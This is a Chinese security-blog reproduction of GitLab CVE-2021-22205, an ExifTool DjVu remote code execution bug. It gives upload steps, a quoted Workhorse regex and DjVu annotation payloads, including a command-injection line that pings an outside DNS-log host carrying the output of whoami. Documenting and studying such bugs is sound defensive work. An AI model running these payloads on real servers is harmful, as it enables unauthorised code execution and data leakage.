Sentry CyberSecurity© 哨兵
    APEREO CAS
    • I. APEREO CAS < 4.2.X 反序列化远程代码执行
    鱼叉攻击策略
    • I. 鱼叉攻击策略落地:从零到一
    • II. 鱼叉攻击策略落地:邮件网关应用
    GITLAB
    • I. GITLAB CVE-2020-10977 任意文件读取漏洞
    • II. GITLAB CVE-2020-10977 任意文件读取漏洞导致的RCE
    • III. GITLAB CVE-2021-22205 SNIPPET RCE
    COBALT STIKE
    • I. COBALT STIKE服务器搭建历程
    • II. COBALT STIKE服务器隐藏真实IP
    • III. 域名前置隐藏C2服务器
    • IV. CS上线木马免杀入门
    APACHE LOG4J2
    • I. APACHE LOG4J2 RCE复现历程
    OCR IN BP
    • I. BURPSUITE验证码插件实验
    CTF
    • I. CTF - 代码审计向
    • II. CTF - 密码学与杂项
    二进制研究/BIN
    • I. HIKVISION-CONFIGURATIONFILES-DECRYPTER
    • II. ROUTER-BINFILE-ANALYSIS
    POLKIT
    • I. POLKIT-CVE-2021-3560
    • II. POLKIT-CVE-2021-4034复现
    代理池:BASED ON SCYLLA
    • I. SCYLLA 搭建步骤
    WAF
    • I. MOD-WAF-BYPASS-WALKTHROUGH
    • II. MODSEC & CLOUDFLARE WAF INITIAL RESEARCH
    代码审计
    • I. DYNAMIC-ANALYSIS-OF-JAVA-FRAMEWORK-CODE
    • II. 安全与开发之:MAVEN构建排错
    • III. 浪潮CLUSTERENGINEV4.0代码审计历程
    SPRING
    • I. SPRINGBOOT-MEMORY-FILES-HEAPDUMP-ANALYSIS
    • II. CVE-2022-22947 SPRING-CLOUD-GATEWAY-RCE
    其他研究
    • I. SQL注入原理分析
    • II. STRUTS2DESER
    • III. 基于内存的SHIRO框架WEBSHELL攻击研究
    • IV. 通达OA利用代码分析
    • V. JRMP-GADGET
    反序列化
    • I. SHIRODESER
    • II. JAVADESER

Build .. / 研究 / Post & Build in: 2022-05-18 by ACTION. Site Version: 2.2.1-307e10d.

  • HOME
  • BLOG
  • CATEGORIES
  • DAILY
  • ABOUT
  • RSS
  • QUICK START
    APEREO CAS
    • I. APEREO CAS < 4.2.X 反序列化远程代码执行
    鱼叉攻击策略
    • I. 鱼叉攻击策略落地:从零到一
    • II. 鱼叉攻击策略落地:邮件网关应用
    GITLAB
    • I. GITLAB CVE-2020-10977 任意文件读取漏洞
    • II. GITLAB CVE-2020-10977 任意文件读取漏洞导致的RCE
    • III. GITLAB CVE-2021-22205 SNIPPET RCE
    COBALT STIKE
    • I. COBALT STIKE服务器搭建历程
    • II. COBALT STIKE服务器隐藏真实IP
    • III. 域名前置隐藏C2服务器
    • IV. CS上线木马免杀入门
    APACHE LOG4J2
    • I. APACHE LOG4J2 RCE复现历程
    OCR IN BP
    • I. BURPSUITE验证码插件实验
    CTF
    • I. CTF - 代码审计向
    • II. CTF - 密码学与杂项
    二进制研究/BIN
    • I. HIKVISION-CONFIGURATIONFILES-DECRYPTER
    • II. ROUTER-BINFILE-ANALYSIS
    POLKIT
    • I. POLKIT-CVE-2021-3560
    • II. POLKIT-CVE-2021-4034复现
    代理池:BASED ON SCYLLA
    • I. SCYLLA 搭建步骤
    WAF
    • I. MOD-WAF-BYPASS-WALKTHROUGH
    • II. MODSEC & CLOUDFLARE WAF INITIAL RESEARCH
    代码审计
    • I. DYNAMIC-ANALYSIS-OF-JAVA-FRAMEWORK-CODE
    • II. 安全与开发之:MAVEN构建排错
    • III. 浪潮CLUSTERENGINEV4.0代码审计历程
    SPRING
    • I. SPRINGBOOT-MEMORY-FILES-HEAPDUMP-ANALYSIS
    • II. CVE-2022-22947 SPRING-CLOUD-GATEWAY-RCE
    其他研究
    • I. SQL注入原理分析
    • II. STRUTS2DESER
    • III. 基于内存的SHIRO框架WEBSHELL攻击研究
    • IV. 通达OA利用代码分析
    • V. JRMP-GADGET
    反序列化
    • I. SHIRODESER
    • II. JAVADESER
本文发布于:2022-05-18 | 哨兵安全实验室

Print document Edit on github

文章目录
    • 复现
    • 效果
    • 分析
    • 参考
  • 复现

    • Create a new snippet
    • 登录创建一个仓库,并且创建新的snippet
    • In the description field, hit "Attach a file"; Select and uplaod echo_vakzz.jpg
    • echo_vakzz.jpg上传附件
    • See that the file /tmp/vakzz has been created on the server

    也可以通过未授权RCE,具体可以查看(CVE-2021-22205)RCE - 七、手工复现-未授权

    制作rce图片可直接编辑,修改下面的代码就好;或者上面的文章中

    [六、手工复现-有授权 - 2 DjVu格式图片制作方式]

    也有相应的制作方法。

    qx{ping `whoami`.5pxha.i3ntq7.bnslog.top}
    

    效果

    May-18-2022-11-27-15.gif

    分析

    如作者在报告里所说:

    • When uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff] through to ExifTool to remove any non-whitelisted tags.
    • 上传图像文件时,GitLab Workhorse 会将任何扩展名为 jpg|jpeg|tiff 的文件传递给 ExifTool,以删除任何未列入白名单的标签。
    func IsExifFile(filename string) bool {
    	filenameMatch := regexp.MustCompile(`(?i)\.(jpg|jpeg|tiff)$`)
    
    	return filenameMatch.MatchString(filename)
    }
    
    • One of the supported formats is DjVu. When parsing the DjVu annotation, the tokens are evaled to “convert C escape sequences”.
    (metadata
    	(Copyright "\
    " . qx{echo vakzz >/tmp/vakzz} . \
    " b ") )
    

    参考

    • HackerOne - RCE when removing metadata with ExifTool
    • GitLab 远程命令执行漏洞复现(CVE-2021-22205)

    申明

    转载请申明本文档链接
    Post by Bin4xin.

    其他

    HOME · 镜像 · 博客 · WIKI

    此文档对您有帮助吗